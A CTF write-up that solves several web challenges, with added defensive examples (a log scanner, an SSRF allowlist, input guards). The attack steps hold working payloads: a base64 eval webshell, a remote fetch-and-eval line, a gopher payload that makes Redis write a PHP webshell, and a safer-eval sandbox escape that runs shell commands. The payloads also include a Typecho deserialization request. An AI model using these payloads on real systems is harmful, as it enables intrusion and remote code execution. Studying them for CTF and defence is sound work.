web1 Sign-in

```
http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
```
This returns phpinfo: a pile of command-execution functions are disabled, but there is no open_basedir, and readfile and friends are not disabled.

```
http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=dmFyX2R1bXAoc2NhbmRpcigiLyIpKTs=
```
Getting the flag requires executing /readflag.
PHP version is 7.3.18, so just throw an nday at it.
/var/www/html is not writable, so host the nday on a remote server, fopen that server to pull the string, and eval it:

```php
eval(file_get_contents("http://6073-48b235c6-49f5-454c-a672-92d70e856fc7/web1help.html"));
```
But the nday would not run this way, no idea why, so fall back to the classic approach: write a shell to tmp and include it.
Alternatively, turn it into a shell and connect with Caidao.
Then write the payload to /tmp and include it:

```
http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1JFUVVFU1RbJ2EnXSk7   # connection password: a
```

```
http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSAiL3RtcC9leHBsb2l0LnBocCI7
```
Same bug, but switching to a different nday made it work; proof that real-world pwn is black magic.

```
https://www.exploit-db.com/exploits/47462
```
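The whole web1 chain rides on a base64-encoded query parameter that the application evals. Here is a defender-side check, added here and not part of the writeup, that scans access-log lines for parameters whose base64 decoding contains a PHP execution or file sink; the log lines and their format are constructed, while the parameter values are the ones used above.

```javascript
// Added example, not part of the writeup: a log-side check for the web1
// pattern, where a query parameter carries base64-encoded PHP that the
// application evals. Sample log lines are constructed; the parameter
// values in them are the ones the writeup sends.
const PHP_SINKS = /\b(eval|assert|system|passthru|shell_exec|include|require|phpinfo|scandir|file_get_contents)\s*[(\s"']/i;

// Decode a value only if it has base64 shape and round-trips exactly,
// which filters out ordinary words that merely look like base64.
function decodeBase64Param(value) {
  if (!/^[A-Za-z0-9+/]{8,}={0,2}$/.test(value)) return null;
  const text = Buffer.from(value, 'base64').toString('utf8');
  const back = Buffer.from(text, 'utf8').toString('base64');
  return back.replace(/=+$/, '') === value.replace(/=+$/, '') ? text : null;
}

// For one request target, return every parameter whose decoded value
// contains a PHP execution or file sink.
function flagRequest(target) {
  const q = target.indexOf('?');
  if (q < 0) return [];
  const hits = [];
  for (const [param, value] of new URLSearchParams(target.slice(q + 1))) {
    const decoded = decodeBase64Param(value);
    if (decoded !== null && PHP_SINKS.test(decoded)) hits.push({ param, decoded });
  }
  return hits;
}

// Scan combined-format access log lines and return the flagged requests.
function scanAccessLog(lines) {
  const out = [];
  for (const line of lines) {
    const m = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    for (const hit of flagRequest(m[1])) out.push({ line, ...hit });
  }
  return out;
}

// Constructed sample: two requests from the writeup plus one benign request
const SAMPLE_LOG = [
  '10.0.0.5 - - [16/May/2020:10:00:00 +0000] "GET /?Ginkgo=cGhwaW5mbygpOw== HTTP/1.1" 200 512',
  '10.0.0.5 - - [16/May/2020:10:00:09 +0000] "GET /?Ginkgo=ZXZhbCgkX1JFUVVFU1RbJ2EnXSk7&a=phpinfo(); HTTP/1.1" 200 77',
  '10.0.0.9 - - [16/May/2020:10:01:00 +0000] "GET /index.php?url=173.22.167.10&submit=1 HTTP/1.1" 200 300',
];

console.log(scanAccessLog(SAMPLE_LOG).map(h => `${h.param} -> ${h.decoded}`));
```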
web2 CVE Sign-in
Visit any URL and the HTTP response header hints: Tips: Host must be end with '123'

```
http://ee6116c9-9cae-4ed4-9c08-2e15f6b87783.node3.buuoj.cn/?url=http://127.0.0.123%00.ctfhub.com
```

And that was it?
web3 Laoba Mall

There is a log leak:
/runtime/log/202005/16.log
The login path is admin.php; the username and password can be found with a Baidu search.

http://www.nctry.com/1660.html

```
http://47d464c1-87d8-4b05-b2cf-d83b1a2147d6.node3.buuoj.cn/public/static/index/default/try.php
```

getshell: the flag is not readable with the current permissions, but there is a backdoor service running as root; modify it to read the flag.

web? EzWeb
The HTML comment hints at ?secret; adding that parameter returns ifconfig output:

```
<!--?secret-->
eth0      Link encap:Ethernet  HWaddr 02:42:ad:16:a7:0a
          inet addr:173.22.167.10  Bcast:173.22.167.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1450  Metric:1
          RX packets:39 errors:0 dropped:0 overruns:0 frame:0
          TX packets:62 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:6552 (6.5 KB)  TX bytes:7566 (7.5 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:40 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2440 (2.4 KB)  TX bytes:2440 (2.4 KB)
```

```
http://cc7700d7-2f14-4b29-833a-cd5eecd0b071.node3.buuoj.cn/index.php?url=173.22.167.10&submit=%E6%8F%90%E4%BA%A4
http://cc7700d7-2f14-4b29-833a-cd5eecd0b071.node3.buuoj.cn/index.php?url=127.2.3.3&submit=%E6%8F%90%E4%BA%A4
```
This returns the page's own source, so it is SSRF.
Judging from the trailing 1 in the result and the request's characteristics, it is curl with the user-agent turned off.

```
http://c89decb9-9a57-4af9-b951-40ee25b93c59.node3.buuoj.cn/index.php?url=file%3A%2Fetc%2Fpasswd&submit=%E6%8F%90%E4%BA%A4
```

/etc/passwd is readable, but curl itself apparently cannot read anything under /proc; it did not work in local testing either.
Read /var/www/html/index.php:
```php
<?php
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // CURLOPT_RETURNTRANSFER is not set, so curl_exec() prints the body
    // itself and returns true; echoing that adds the trailing "1" seen above
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
    $url = $_GET['url'];
    // Denylist: "file://", "dict", "../", "127.0.0.1" and "localhost"
    // (the dots in 127.0.0.1 are unescaped, so each matches any character)
    if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match)) {
        die('别这样');
    }
    curl($url);
}

if(isset($_GET['secret'])){
    system('ifconfig');
}
?>
```
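The filter above is a denylist, which is why file:/etc/passwd (one slash) and 127.2.3.3 pass it. The block below is an added example, not code from the challenge, placing that regex beside an allowlist-style check; the helper names are mine, and the private-range list and hostname rules are my own choices.

```javascript
// Added example, not the challenge's code: the EzWeb denylist regex (copied
// from index.php above) beside an allowlist-style check written for contrast.
const DENYLIST = /file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is;

// Mirrors the challenge's check: true means the URL would be fetched.
function denylistAllows(url) {
  return !DENYLIST.test(url);
}

// Loopback, RFC 1918, link-local and "this network" ranges for an IPv4 literal.
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 || (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Allowlist: parse with the WHATWG URL parser, accept only http(s), and
// refuse loopback/private hosts and anything but plain hostname characters.
// A production check must also resolve the name and test the resolved
// address, or a DNS answer can still point back inside the network.
function allowlistAllows(url) {
  let u;
  try { u = new URL(url); } catch (e) { return false; }   // unparsable input is refused
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  const host = u.hostname;                                 // parser normalises e.g. 2130706433 to 127.0.0.1
  if (!/^[a-z0-9.-]+$/i.test(host)) return false;          // rejects IPv6 literals, NULs, encoded junk
  if (host === 'localhost' || host.endsWith('.localhost')) return false;
  return !isPrivateIPv4(host);
}
```

Note that the allowlist still passes http://173.22.167.11/ because that address is outside the private ranges, so the URL check is necessary but not sufficient and needs network egress restrictions alongside it.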
Fuzzing turned up redis on port 6379 of .11; /etc/hosts gave no hint either, are you kidding me?
.11 also runs a web server, so use redis to write a PHP webshell:

```
gopher://173.22.167.11:6379/%5f%25%32%41%31%25%30%44%25%30%41%25%32%34%38%25%30%44%25%30%41%66%6c%75%73%68%61%6c%6c%25%30%44%25%30%41%25%32%41%33%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%25%30%44%25%30%41%31%25%30%44%25%30%41%25%32%34%33%30%25%30%44%25%30%41%25%30%41%25%30%41%25%33%43%25%33%46%70%68%70%25%32%30%25%34%30%65%76%61%6c%25%32%38%25%32%34%5f%47%45%54%25%35%42%25%32%37%62%25%32%37%25%35%44%25%32%39%25%33%42%25%33%46%25%33%45%25%30%41%25%30%41%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%64%69%72%25%30%44%25%30%41%25%32%34%31%33%25%30%44%25%30%41%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%30%25%30%44%25%30%41%64%62%66%69%6c%65%6e%61%6d%65%25%30%44%25%30%41%25%32%34%39%25%30%44%25%30%41%73%68%65%6c%6c%2e%70%68%70%25%30%44%25%30%41%25%32%41%31%25%30%44%25%30%41%25%32%34%34%25%30%44%25%30%41%73%61%76%65%25%30%44%25%30%41%25%30%41   # password is b
```

```
http://c89decb9-9a57-4af9-b951-40ee25b93c59.node3.buuoj.cn/index.php?url=173.22.167.11%2Fshell.php%3Fb%3Dreadfile%28%22%2Fflag%22%29%3B&submit=%E6%8F%90%E4%BA%A4
```
web? EzNode

```javascript
const express = require('express');
const bodyParser = require('body-parser');
const saferEval = require('safer-eval');
const fs = require('fs');
const app = express();
app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// Gate in front of /eval: next() is scheduled after at least 60 s, while a
// second timer fires after 1 s, cancels it and answers "Timeout!", so the
// handler below should never be reachable
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {
      }
    }, 1000);
  } else {
    next();
  }
});

// Evaluates user input inside safer-eval 1.3.6
app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => { console.log('Start listening') });
```

```json
{
  "name": "src",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "dependencies": {
    "body-parser": "1.19.0",
    "express": "4.17.1",
    "safer-eval": "1.3.6"
  }
}
```
https://snyk.io/vuln/SNYK-JS-SAFEREVAL-534901
https://stackoverflow.com/questions/3468607/why-does-settimeout-break-for-large-millisecond-delay-values

```http
POST http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn/eval?delay=2147483648 HTTP/1.1
Host: 5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn
Connection: keep-alive
Content-Length: 751
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn
Referer: http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
X-Forwarded-For: 172.25.0.11

e=(function+()+%7B%0A++const+f+%3D+Buffer.prototype.write%3B%0A++const+ft+%3D+%7B%0A++++length%3A+10%2C%0A++++utf8Write()%7B%0A%0A++++%7D%0A++%7D%3B%0A++function+r(i)%7B%0A++++var+x+%3D+0%3B%0A++++try%7B%0A++++++x+%3D+r(i)%3B%0A++++%7Dcatch(e)%7B%7D%0A++++if(typeof(x)!%3D%3D'number')%0A++++++return+x%3B%0A++++if(x!%3D%3Di)%0A++++++return+x%2B1%3B%0A++++try%7B%0A++++++f.call(ft)%3B%0A++++%7Dcatch(e)%7B%0A++++++return+e%3B%0A++++%7D%0A++++return+null%3B%0A++%7D%0A++var+i%3D1%3B%0A++while(1)%7B%0A++++try%7B%0A++++++i%3Dr(i).constructor.constructor(%22return+process%22)()%3B%0A++++++break%3B%0A++++%7Dcatch(x)%7B%0A++++++i%2B%2B%3B%0A++++%7D%0A++%7D%0A++return+i.mainModule.require(%22child_process%22).execSync(%22cat /flag%22).toString()%0A%7D)()
```

One shot; I just love nday challenges.
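The middleware's Math.max guard reads like a hard 60-second floor, but Node's setTimeout only honours delays up to 2^31-1 ms and resets larger ones to 1 ms, which is the behaviour the linked Stack Overflow question describes. The block below is an added example, not the challenge's code: it reproduces the guard, models that reset, and shows a guard that rejects out-of-range values instead; challengeDelay, effectiveTimeout and safeDelay are my names.

```javascript
// Added example, not from the challenge: the delay guard from EzNode's
// middleware (reproduced as challengeDelay) and why it fails once the value
// exceeds what setTimeout can represent. effectiveTimeout models Node's
// documented behaviour; safeDelay is a hardened replacement.
const TIMEOUT_MAX = 2 ** 31 - 1;   // largest delay setTimeout honours (ms)
const MIN_DELAY = 60 * 1000;       // the challenge's floor: next() after >= 60 s

// What the challenge computes for ?delay=<value>; reads as "never below 60 s"
function challengeDelay(query) {
  let delay = MIN_DELAY;
  if (Number.isInteger(parseInt(query))) {
    delay = Math.max(delay, parseInt(query));
  }
  return delay;
}

// Node replaces a delay outside 1..TIMEOUT_MAX with 1 ms (and emits a
// TimeoutOverflowWarning), so the 60 s floor collapses to one millisecond
// and next() runs before the 1 s "Timeout!" timer can cancel it.
function effectiveTimeout(ms) {
  return ms >= 1 && ms <= TIMEOUT_MAX ? ms : 1;
}

// Hardened guard: digits only, and refuse values the timer cannot honour
// rather than passing them through. Returns null when the request should
// be rejected outright.
function safeDelay(query) {
  if (query === undefined) return MIN_DELAY;
  if (!/^\d{1,10}$/.test(String(query))) return null;
  const n = Number(query);
  return n >= MIN_DELAY && n <= TIMEOUT_MAX ? n : null;
}

// Live check: the oversized delay fires almost immediately.
function demo() {
  const start = Date.now();
  setTimeout(() => {
    console.log('next() fired after', Date.now() - start, 'ms');
  }, challengeDelay('2147483648'));
}
demo();
```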
Web? Node-Exe
The installer is about the same as etcher's and can be extracted directly.
Unpack the app.asar under resources/
https://stackoverflow.com/questions/38523617/how-to-unpack-an-asar-file

```shell
npm install -g asar   # or cnpm install -g asar, whichever is faster
# unpack
npx asar extract app.asar app
# pack
asar pack app app.asar
```
Add .openDevTools(); at a suitable spot to open the devtools window.

Repack, trigger your own code, and the devtools open.

It should be about how token and timestamp are computed.
Set an XHR breakpoint.

The call stack becomes visible:
```javascript
methods: {
    encrypt: function(e, i, t) {
        var o = this;
        return c()(a.a.mark((function n() {
            return a.a.wrap((function(o) {
                for (; ; )
                    switch (o.prev = o.next) {
                    case 0:
                        return o.abrupt("return", new s.a((function(o) {
                            var n = p.a.createCipheriv("aes-128-cbc", e, i)
                              , r = n.update(t, "utf8", "binary");
                            r += n.final("binary"),
                            o(r = new Buffer.from(r,"binary").toString("hex"))
                        }
                        )));
                    case 1:
                    case "end":
                        return o.stop()
                    }
            }
            ), n, o)
        }
        )))()
    },
    makeToken: function(e) {
        var i = this;
        return c()(a.a.mark((function t() {
            var o, r;
            return a.a.wrap((function(t) {
                for (; ; )
                    switch (t.prev = t.next) {
                    case 0:
                        return "31169fedc9a20ecf",
                        "d96adeefaa0102a9",
                        o = f()(n()(e)),
                        t.next = 5,
                        i.encrypt("31169fedc9a20ecf", "d96adeefaa0102a9", o);
                    case 5:
                        return r = t.sent,
                        t.abrupt("return", r);
                    case 7:
                    case "end":
                        return t.stop()
                    }
            }
            ), t, i)
        }
        )))()
    },
    buyFlag: function(e) {
        var i = this;
        return c()(a.a.mark((function t() {
            var o;
            return a.a.wrap((function(t) {
                for (; ; )
                    switch (t.prev = t.next) {
                    case 0:
                        return o = {
                            id: e,
                            timestamp: Date.parse(new Date)
                        },
                        t.t0 = i.$http,
                        t.t1 = i.url + "/buyflag",
                        t.t2 = o,
                        t.next = 6,
                        i.makeToken(o);
                    case 6:
                        t.t3 = t.sent,
                        t.t4 = {
                            token: t.t3
                        },
                        t.t5 = {
                            headers: t.t4
                        },
                        t.t6 = function(e) {
                            i.$Modal.info({
                                title: "购买结果",
                                content: e.data[0].flag
                            })
                        }
                        ,
                        t.t0.post.call(t.t0, t.t1, t.t2, t.t5).then(t.t6);
                    case 11:
                    case "end":
                        return t.stop()
                    }
            }
            ), t, i)
        }
```
The pretty-printed JS in Chrome devtools can only take breakpoints, not edits, and because of the timestamp there is no time to modify the request at an XHR breakpoint, so break only at buyFlag and change the flag type to 3, which yields a "cannot purchase" message.

Change the flag type to the string 3||1
and it works.
So what does this count as: SQL injection? weak typing? parseInt ignoring trailing characters?

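The backend was never shown, so what made 3||1 work is unknown. As an added illustration that is not the challenge's code, the block below shows how that string fares under the behaviours the question names (parseInt, Number conversion, loose comparison) and a strict check of the { id, timestamp } body that refuses it; all function names are mine.

```javascript
// Added example, not the challenge's server (whose code the writeup never
// shows): how an id of "3||1" fares under the parsing behaviours the question
// above names, plus a strict server-side check of the buyflag request body.
// What the real backend did is unknown.
function parseIntId(value) {
  return parseInt(value, 10);        // stops at the first non-digit: "3||1" -> 3
}

function numberId(value) {
  return Number(value);              // whole-string conversion: "3||1" -> NaN
}

function looseEqualsThree(value) {
  return value == 3;                 // "3||1" == 3 is false; "3" == 3 is true
}

// Strict: a JSON number that is a non-negative safe integer, or a string of
// digits with no leading zeros. Anything else is rejected, not coerced.
function strictId(value) {
  if (typeof value === 'number') {
    return Number.isSafeInteger(value) && value >= 0 ? value : null;
  }
  if (typeof value === 'string' && /^(0|[1-9]\d*)$/.test(value)) {
    return Number(value);
  }
  return null;
}

// Server-side validation of { id, timestamp } as sent by buyFlag above,
// with a freshness window so a captured body cannot be replayed later.
function validateBuyRequest(body, nowMs, windowMs) {
  const id = strictId(body && body.id);
  if (id === null) return { ok: false, reason: 'bad id' };
  const ts = Number(body.timestamp);
  if (!Number.isInteger(ts) || Math.abs(nowMs - ts) > windowMs) {
    return { ok: false, reason: 'stale timestamp' };
  }
  return { ok: true, id };
}
```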
Web? EzTypeEcho
https://www.freebuf.com/vuls/152058.html
install dropped the session_start call.

The deserialization originally at finish has had a check added: it only passes when the SESSION exists.

But the same deserialization also exists at start, without that check, so the payload from the link above works in one shot.

```http
GET http://b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn/install.php?start HTTP/1.1
Host: b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=77o478sbht9as7ibcof6v2nqu0; __typecho_config=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; __typecho_lang=zh_CN
Referer: http://b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn/install.php?
```